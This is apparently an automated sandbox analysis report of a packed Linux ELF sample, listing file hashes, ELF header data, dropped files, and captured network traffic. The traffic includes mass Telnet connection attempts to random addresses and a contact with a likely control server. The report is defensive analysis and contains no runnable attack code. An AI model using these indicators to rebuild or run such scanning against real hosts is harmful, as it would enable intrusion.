                                                    SHA1:019A36F63C25A61295EE1392E732AD026EA15B7A
                                                    SHA-256:AC7E499BD761809A7DAAD8C50C1DF4DBE41A31874F2E64F050226EE9E01A41E3
                                                    SHA-512:AD986843B83D40D498E7C25C043CB1A5B1B3308B4A92FEB86DD1F26D3AACDB4A276FC7613A6A73536631F9BBD690DA3C425E8A5C3C58F7AD1DD44A4963C3549B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:6408.
                                                    Process:/usr/bin/pulseaudio
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):5
                                                    Entropy (8bit):2.321928094887362
                                                    Encrypted:false
                                                    SSDEEP:3:ZJ:3
                                                    MD5:0B81E3557F5A8F4C80FD3019BAE5B2A8
                                                    SHA1:6513EDB0A74AB0B971C3BA40438A1503DCE5BEDD
                                                    SHA-256:47D91EFF9864643B8A02369B85CEE34752D7C506D1E65EC281931E060D03195F
                                                    SHA-512:DE11D2D133461CD8EB736C5BDA6465FCF50F73C82AF7F4610B58211BAA5BBD3E3D7DF894BB2184FC410FB6DE1E24A88CDFB2F729DB285D5694ABC645F4C4F539
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:6374.
                                                    Process:/usr/bin/gpu-manager
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):2.7550849518197795
                                                    Encrypted:false
                                                    SSDEEP:3:JoT/V9fDVbn:M/V3n
                                                    MD5:078760523943E160756979906B85FB5E
                                                    SHA1:0962643266F4C5537F7D125046F28F21D6DD0C89
                                                    SHA-256:048416AC7A9A99690B8B53718CD39F32F637B55CC8DD8E67E58E5AEF060DD41C
                                                    SHA-512:DEFAAE8F8B54C61A716A0B0B4884358FEB8EB44DFEA01AAA5A687FDA7182792B7DEBB34AA840672EB3B40EB59FD0186749E08E47D181786C7FAA8C8F73F0104D
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:15ad:0405;0000:00:0f:0;1.
                                                    Process:/usr/bin/gpu-manager
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):1371
                                                    Entropy (8bit):4.8296848499188485
                                                    Encrypted:false
                                                    SSDEEP:24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555cJz:wPXXXe6vejpeC2HUR5WkpPpcvAdow95O
                                                    MD5:3AF77E630DA00B3BE24F4E8AA5D78B13
                                                    SHA1:BCF2D99E002F6DE2413A183227B011CFBEF5673D
                                                    SHA-256:EB1CBBA20845237B4409274D693FEAE13F835274DA3337B7A9D14F4D7FDF9DEA
                                                    SHA-512:8524B1E8A761F962B32F396812099B9B0B2DCF3C9FCA8605424753CFCFF4DC67EDC5EE1D8C91B9C0ED7FAE6BB1E752898B8D514B7C421D1839D6FEDA609C593C
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce

                                                    Static File Info

                                                    General

                                                    File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                                    Entropy (8bit):7.9621733549693054
                                                    TrID:
                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                    File name:xd.x86_64.elf
                                                    File size:38'924 bytes
                                                    MD5:e59bf6760fd1be7b7fdb51b0c8038c27
                                                    SHA1:29b0741492548fc34e5c2ec6855f9240dbeb0788
                                                    SHA256:cd21516feb04d3b1fa6eac9d7db9b633d965f63fd93efaf3f6f042f894302f67
                                                    SHA512:5f5c67d442eed2b4bb51ad05f6b3b82229546fe4d9fa5c96860409737d2767a4cc0987f19896a636fbdc1019d79738e9e7d66274a08f752d2846d913485eb6bd
                                                    SSDEEP:768:NcRbhrK2x7kJUY7v9bpZf75WCFRcnLbPbBQcZ/eSV7GorLCNVMG5Vx07P:NcPFx9Y7Br75TF0LT/lzV7XLyDbOP
                                                    TLSH:8C03F1C710F9E6FCE074A4F32C9EA2D0E967A837D46B1A8792C1F8BF4577C611806650
                                                    File Content Preview:.ELF..............>.............@...................@.8...@.....................................................................(.......(zQ.....(zQ.............................Q.td.....................................................G..UPX!H....... M.. M.

                                                    Static ELF Info

                                                    ELF header

                                                    Class:ELF64
                                                    Data:2's complement, little endian
                                                    Version:1 (current)
                                                    Machine:Advanced Micro Devices X86-64
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x1085d8
                                                    Flags:0x0
                                                    ELF Header Size:64
                                                    Program Header Offset:64
                                                    Program Header Size:56
                                                    Number of Program Headers:3
                                                    Section Header Offset:0
                                                    Section Header Size:64
                                                    Number of Section Headers:0
                                                    Header String Table Index:0

                                                    Program Segments

                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x1000000x1000000x97140x97147.96470x5R E0x100000
                                                    LOAD0xa280x517a280x517a280x00x00.00000x6RW 0x1000
                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

                                                    Network Behavior

                                                    Download Network PCAP: filteredfull

                                                    Network Port Distribution

                                                    • Total Packets: 190
                                                    • 5466 undefined
                                                    • 443 (HTTPS)
                                                    • 80 (HTTP)
                                                    • 53 (DNS)
                                                    • 23 (Telnet)
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 2, 2025 20:48:07.204885006 CEST43928443192.168.2.2391.189.91.42
                                                    Apr 2, 2025 20:48:08.300261974 CEST524585466192.168.2.23213.209.129.92
                                                    Apr 2, 2025 20:48:08.310960054 CEST5436823192.168.2.2312.189.173.171
                                                    Apr 2, 2025 20:48:08.310962915 CEST5436823192.168.2.23161.199.5.105
                                                    Apr 2, 2025 20:48:08.310962915 CEST5436823192.168.2.23254.245.127.51
                                                    Apr 2, 2025 20:48:08.310966015 CEST5436823192.168.2.23192.115.166.171
                                                    Apr 2, 2025 20:48:08.310969114 CEST5436823192.168.2.2316.6.113.70
                                                    Apr 2, 2025 20:48:08.310975075 CEST5436823192.168.2.23147.26.119.110
                                                    Apr 2, 2025 20:48:08.310981989 CEST5436823192.168.2.23121.89.109.139
                                                    Apr 2, 2025 20:48:08.310981989 CEST5436823192.168.2.235.16.143.8
                                                    Apr 2, 2025 20:48:08.310990095 CEST5436823192.168.2.23116.108.198.23
                                                    Apr 2, 2025 20:48:08.310990095 CEST5436823192.168.2.23115.185.178.131
                                                    Apr 2, 2025 20:48:08.310990095 CEST5436823192.168.2.23130.247.60.236
                                                    Apr 2, 2025 20:48:08.310992002 CEST5436823192.168.2.23244.51.105.232
                                                    Apr 2, 2025 20:48:08.310992002 CEST5436823192.168.2.23157.21.254.41
                                                    Apr 2, 2025 20:48:08.310993910 CEST5436823192.168.2.2323.10.96.54
                                                    Apr 2, 2025 20:48:08.311008930 CEST5436823192.168.2.23141.183.150.18
                                                    Apr 2, 2025 20:48:08.311008930 CEST5436823192.168.2.23154.26.237.50
                                                    Apr 2, 2025 20:48:08.311008930 CEST5436823192.168.2.2399.219.67.198
                                                    Apr 2, 2025 20:48:08.311008930 CEST5436823192.168.2.2361.142.188.43
                                                    Apr 2, 2025 20:48:08.311008930 CEST5436823192.168.2.23183.241.183.213
                                                    Apr 2, 2025 20:48:08.311024904 CEST5436823192.168.2.23167.129.57.101
                                                    Apr 2, 2025 20:48:08.311024904 CEST5436823192.168.2.23121.47.110.131
                                                    Apr 2, 2025 20:48:08.311024904 CEST5436823192.168.2.2317.21.68.155
                                                    Apr 2, 2025 20:48:08.311026096 CEST5436823192.168.2.2385.128.147.59
                                                    Apr 2, 2025 20:48:08.311026096 CEST5436823192.168.2.23211.177.213.206
                                                    Apr 2, 2025 20:48:08.311026096 CEST5436823192.168.2.2338.236.162.166
                                                    Apr 2, 2025 20:48:08.311026096 CEST5436823192.168.2.2378.47.133.136
                                                    Apr 2, 2025 20:48:08.311029911 CEST5436823192.168.2.23195.138.37.13
                                                    Apr 2, 2025 20:48:08.311029911 CEST5436823192.168.2.23170.227.100.25
                                                    Apr 2, 2025 20:48:08.311031103 CEST5436823192.168.2.23241.14.59.13
                                                    Apr 2, 2025 20:48:08.311031103 CEST5436823192.168.2.23154.21.58.134
                                                    Apr 2, 2025 20:48:08.311031103 CEST5436823192.168.2.23188.246.192.92
                                                    Apr 2, 2025 20:48:08.311034918 CEST5436823192.168.2.23116.22.120.195
                                                    Apr 2, 2025 20:48:08.311034918 CEST5436823192.168.2.23126.214.91.90
                                                    Apr 2, 2025 20:48:08.311034918 CEST5436823192.168.2.2380.31.88.89
                                                    Apr 2, 2025 20:48:08.311034918 CEST5436823192.168.2.232.80.2.208
                                                    Apr 2, 2025 20:48:08.311036110 CEST5436823192.168.2.23216.164.110.37
                                                    Apr 2, 2025 20:48:08.311041117 CEST5436823192.168.2.23246.217.204.62
                                                    Apr 2, 2025 20:48:08.311041117 CEST5436823192.168.2.2314.178.8.215
                                                    Apr 2, 2025 20:48:08.311041117 CEST5436823192.168.2.23241.115.228.197
                                                    Apr 2, 2025 20:48:08.311041117 CEST5436823192.168.2.23244.229.26.5
                                                    Apr 2, 2025 20:48:08.311053038 CEST5436823192.168.2.2336.134.15.139
                                                    Apr 2, 2025 20:48:08.311058998 CEST5436823192.168.2.23216.207.124.173
                                                    Apr 2, 2025 20:48:08.311058998 CEST5436823192.168.2.23253.52.231.222
                                                    Apr 2, 2025 20:48:08.311058998 CEST5436823192.168.2.23223.184.40.9
                                                    Apr 2, 2025 20:48:08.311062098 CEST5436823192.168.2.2382.237.35.139
                                                    Apr 2, 2025 20:48:08.311062098 CEST5436823192.168.2.2393.22.21.246
                                                    Apr 2, 2025 20:48:08.311077118 CEST5436823192.168.2.23240.228.28.19
                                                    Apr 2, 2025 20:48:08.311090946 CEST5436823192.168.2.2372.203.37.240
                                                    Apr 2, 2025 20:48:08.311090946 CEST5436823192.168.2.2388.82.18.131
                                                    Apr 2, 2025 20:48:08.311093092 CEST5436823192.168.2.23177.105.127.22
                                                    Apr 2, 2025 20:48:08.311093092 CEST5436823192.168.2.2318.189.89.184
                                                    Apr 2, 2025 20:48:08.311094999 CEST5436823192.168.2.23110.208.0.147
                                                    Apr 2, 2025 20:48:08.311094999 CEST5436823192.168.2.2394.60.56.54
                                                    Apr 2, 2025 20:48:08.311098099 CEST5436823192.168.2.2376.85.51.18
                                                    Apr 2, 2025 20:48:08.311098099 CEST5436823192.168.2.23245.217.1.207
                                                    Apr 2, 2025 20:48:08.311098099 CEST5436823192.168.2.23221.122.117.66
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.23128.7.146.97
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.2368.103.178.238
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.23202.247.16.34
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.23177.98.91.168
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.23112.84.240.177
                                                    Apr 2, 2025 20:48:08.311106920 CEST5436823192.168.2.23253.129.188.166
                                                    Apr 2, 2025 20:48:08.311110020 CEST5436823192.168.2.23220.207.160.167
                                                    Apr 2, 2025 20:48:08.311113119 CEST5436823192.168.2.235.125.118.195
                                                    Apr 2, 2025 20:48:08.311113119 CEST5436823192.168.2.23179.246.229.122
                                                    Apr 2, 2025 20:48:08.311115026 CEST5436823192.168.2.23223.40.246.81
                                                    Apr 2, 2025 20:48:08.311115026 CEST5436823192.168.2.2398.29.211.87
                                                    Apr 2, 2025 20:48:08.311115026 CEST5436823192.168.2.2361.129.21.21
                                                    Apr 2, 2025 20:48:08.311115026 CEST5436823192.168.2.234.45.31.125
                                                    Apr 2, 2025 20:48:08.311117887 CEST5436823192.168.2.23117.21.106.178
                                                    Apr 2, 2025 20:48:08.311113119 CEST5436823192.168.2.2380.252.169.179
                                                    Apr 2, 2025 20:48:08.311114073 CEST5436823192.168.2.2397.117.70.242
                                                    Apr 2, 2025 20:48:08.311114073 CEST5436823192.168.2.23124.188.122.223
                                                    Apr 2, 2025 20:48:08.311114073 CEST5436823192.168.2.2341.62.227.22
                                                    Apr 2, 2025 20:48:08.311139107 CEST5436823192.168.2.23250.227.159.174
                                                    Apr 2, 2025 20:48:08.311155081 CEST5436823192.168.2.2313.223.156.99
                                                    Apr 2, 2025 20:48:08.311155081 CEST5436823192.168.2.2388.88.22.111
                                                    Apr 2, 2025 20:48:08.311155081 CEST5436823192.168.2.23161.218.18.111
                                                    Apr 2, 2025 20:48:08.311161041 CEST5436823192.168.2.23218.134.28.158
                                                    Apr 2, 2025 20:48:08.311161041 CEST5436823192.168.2.23197.234.99.229
                                                    Apr 2, 2025 20:48:08.311161041 CEST5436823192.168.2.23183.149.65.171
                                                    Apr 2, 2025 20:48:08.311161041 CEST5436823192.168.2.2335.195.56.8
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23130.228.130.43
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23246.165.174.214
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2340.181.2.94
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23243.161.107.20
                                                    Apr 2, 2025 20:48:08.311167955 CEST5436823192.168.2.23216.210.78.168
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.23222.125.243.210
                                                    Apr 2, 2025 20:48:08.311167955 CEST5436823192.168.2.23159.34.85.128
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23184.98.147.135
                                                    Apr 2, 2025 20:48:08.311167955 CEST5436823192.168.2.23180.23.122.31
                                                    Apr 2, 2025 20:48:08.311170101 CEST5436823192.168.2.2368.166.120.203
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23242.198.237.200
                                                    Apr 2, 2025 20:48:08.311170101 CEST5436823192.168.2.2395.254.250.93
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23252.123.160.224
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2394.96.217.68
                                                    Apr 2, 2025 20:48:08.311166048 CEST5436823192.168.2.23121.184.107.27
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2359.95.168.236
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2337.241.86.139
                                                    Apr 2, 2025 20:48:08.311167002 CEST5436823192.168.2.2313.168.105.138
                                                    Apr 2, 2025 20:48:08.311223984 CEST5436823192.168.2.2387.250.9.68
                                                    Apr 2, 2025 20:48:08.311224937 CEST5436823192.168.2.23110.59.198.27
                                                    Apr 2, 2025 20:48:08.311224937 CEST5436823192.168.2.23103.130.5.196
                                                    Apr 2, 2025 20:48:08.311224937 CEST5436823192.168.2.23177.13.52.64
                                                    Apr 2, 2025 20:48:08.311224937 CEST5436823192.168.2.23146.247.144.15
                                                    Apr 2, 2025 20:48:08.311233044 CEST5436823192.168.2.23204.4.146.189
                                                    Apr 2, 2025 20:48:08.311233044 CEST5436823192.168.2.23249.228.0.167
                                                    Apr 2, 2025 20:48:08.311233997 CEST5436823192.168.2.239.201.221.80
                                                    Apr 2, 2025 20:48:08.311233997 CEST5436823192.168.2.23149.172.155.16
                                                    Apr 2, 2025 20:48:08.311233997 CEST5436823192.168.2.23158.98.57.71
                                                    Apr 2, 2025 20:48:08.311233997 CEST5436823192.168.2.23178.99.178.38
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.2359.2.114.24
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.2318.6.19.3
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.23119.217.95.162
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.23152.100.68.87
                                                    Apr 2, 2025 20:48:08.311240911 CEST5436823192.168.2.23210.237.235.103
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.23124.232.207.12
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23180.39.170.15
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.23203.237.190.86
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.23191.120.161.81
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23253.226.63.167
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.2365.18.118.7
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.23161.162.19.140
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23189.254.49.59
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2312.186.243.2
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.23126.208.88.215
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23165.109.69.21
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2320.32.212.218
                                                    Apr 2, 2025 20:48:08.311249018 CEST5436823192.168.2.2390.110.144.185
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23248.255.238.237
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23204.147.129.185
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2347.170.129.90
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23119.165.25.70
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2376.237.65.216
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23112.109.12.70
                                                    Apr 2, 2025 20:48:08.311254978 CEST5436823192.168.2.23112.234.76.96
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23197.82.38.214
                                                    Apr 2, 2025 20:48:08.311254978 CEST5436823192.168.2.23198.97.53.33
                                                    Apr 2, 2025 20:48:08.311247110 CEST5436823192.168.2.23113.150.21.42
                                                    Apr 2, 2025 20:48:08.311253071 CEST5436823192.168.2.23172.225.70.132
                                                    Apr 2, 2025 20:48:08.311265945 CEST5436823192.168.2.23165.115.225.248
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.2317.249.197.30
                                                    Apr 2, 2025 20:48:08.311254978 CEST5436823192.168.2.23114.223.17.148
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.23255.86.231.30
                                                    Apr 2, 2025 20:48:08.311245918 CEST5436823192.168.2.23190.91.109.14
                                                    Apr 2, 2025 20:48:08.311253071 CEST5436823192.168.2.23247.204.7.139
                                                    Apr 2, 2025 20:48:08.311248064 CEST5436823192.168.2.2314.247.77.19
                                                    Apr 2, 2025 20:48:08.311253071 CEST5436823192.168.2.23246.138.217.164
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.23157.188.47.205
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.23249.112.2.121
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.2344.20.4.71
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.23213.175.48.125
                                                    Apr 2, 2025 20:48:08.311254025 CEST5436823192.168.2.23206.237.4.19
                                                    Apr 2, 2025 20:48:08.527679920 CEST546652458213.209.129.92192.168.2.23
                                                    Apr 2, 2025 20:48:12.832271099 CEST42836443192.168.2.2391.189.91.43
                                                    Apr 2, 2025 20:48:14.112283945 CEST4251680192.168.2.23109.202.202.202
                                                    Apr 2, 2025 20:48:28.958058119 CEST43928443192.168.2.2391.189.91.42
                                                    Apr 2, 2025 20:48:31.584300995 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:31.584347010 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:31.584413052 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:33.864469051 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:33.864495039 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.091912031 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.092190981 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.092648983 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.092648983 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.092660904 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.092677116 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.092730045 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.093086004 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.093086004 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.093107939 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.093456030 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.296890020 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297080040 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297080040 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297080040 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297123909 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297194958 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297210932 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297230005 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297262907 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297264099 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297274113 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297278881 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297302008 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297332048 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297333002 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297364950 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297380924 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297385931 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297434092 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297513962 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297519922 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297554016 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297574043 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297574043 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.297583103 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.297589064 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.733427048 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.733515024 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:34.733516932 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.734708071 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.734708071 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.734708071 CEST37606443192.168.2.23162.213.35.24
                                                    Apr 2, 2025 20:48:34.734730959 CEST44337606162.213.35.24192.168.2.23
                                                    Apr 2, 2025 20:48:39.196595907 CEST42836443192.168.2.2391.189.91.43
                                                    Apr 2, 2025 20:48:45.339828968 CEST4251680192.168.2.23109.202.202.202
                                                    Apr 2, 2025 20:49:09.912426949 CEST43928443192.168.2.2391.189.91.42
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 2, 2025 20:48:31.308300972 CEST4392953192.168.2.231.1.1.1
                                                    Apr 2, 2025 20:48:31.308353901 CEST4685653192.168.2.231.1.1.1
                                                    Apr 2, 2025 20:48:31.415242910 CEST53439291.1.1.1192.168.2.23
                                                    Apr 2, 2025 20:48:31.415497065 CEST53468561.1.1.1192.168.2.23
                                                    Apr 2, 2025 20:48:31.469014883 CEST4454253192.168.2.231.1.1.1
                                                    Apr 2, 2025 20:48:31.577485085 CEST53445421.1.1.1192.168.2.23
                                                    TimestampSource IPDest IPChecksumCodeType
                                                    Apr 2, 2025 20:48:35.918900967 CEST192.168.2.23192.168.2.18283(Port unreachable)Destination Unreachable
                                                    Apr 2, 2025 20:49:55.935602903 CEST192.168.2.23192.168.2.18283(Port unreachable)Destination Unreachable

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Apr 2, 2025 20:48:31.308300972 CEST192.168.2.231.1.1.10x5f05Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                    Apr 2, 2025 20:48:31.308353901 CEST192.168.2.231.1.1.10x321fStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                    Apr 2, 2025 20:48:31.469014883 CEST192.168.2.231.1.1.10xbc7aStandard query (0)daisy.ubuntu.com28IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Apr 2, 2025 20:48:31.415242910 CEST1.1.1.1192.168.2.230x5f05No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                    Apr 2, 2025 20:48:31.415242910 CEST1.1.1.1192.168.2.230x5f05No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • daisy.ubuntu.com

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    0192.168.2.2337606162.213.35.24443
                                                    TimestampBytes transferredDirectionData
                                                    2025-04-02 18:48:34 UTC307OUTPOST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1
                                                    Host: daisy.ubuntu.com
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    X-Whoopsie-Version: 0.2.69ubuntu0.3
                                                    Content-Length: 164887
                                                    Expect: 100-continue
                                                    2025-04-02 18:48:34 UTC25INHTTP/1.1 100 Continue
                                                    2025-04-02 18:48:34 UTC16384OUTData Raw: 17 84 02 00 02 50 72 6f 63 45 6e 76 69 72 6f 6e 00 4e 00 00 00 50 41 54 48 3d 28 63 75 73 74 6f 6d 2c 20 6e 6f 20 75 73 65 72 29 0a 58 44 47 5f 52 55 4e 54 49 4d 45 5f 44 49 52 3d 3c 73 65 74 3e 0a 4c 41 4e 47 3d 65 6e 5f 55 53 2e 55 54 46 2d 38 0a 53 48 45 4c 4c 3d 2f 62 69 6e 2f 62 61 73 68 00 02 5f 4c 6f 67 69 6e 64 53 65 73 73 69 6f 6e 00 02 00 00 00 35 00 02 44 61 74 65 00 19 00 00 00 54 75 65 20 41 75 67 20 31 37 20 32 30 3a 31 38 3a 30 34 20 32 30 32 31 00 02 53 6f 75 72 63 65 50 61 63 6b 61 67 65 00 0d 00 00 00 6c 69 67 68 74 2d 6c 6f 63 6b 65 72 00 02 50 61 63 6b 61 67 65 41 72 63 68 69 74 65 63 74 75 72 65 00 06 00 00 00 61 6d 64 36 34 00 02 41 72 63 68 69 74 65 63 74 75 72 65 00 06 00 00 00 61 6d 64 36 34 00 02 44 69 73 74 72 6f 52 65 6c 65 61
                                                    Data Ascii: ProcEnvironNPATH=(custom, no user)XDG_RUNTIME_DIR=<set>LANG=en_US.UTF-8SHELL=/bin/bash_LogindSession5DateTue Aug 17 20:18:04 2021SourcePackagelight-lockerPackageArchitectureamd64Architectureamd64DistroRelea
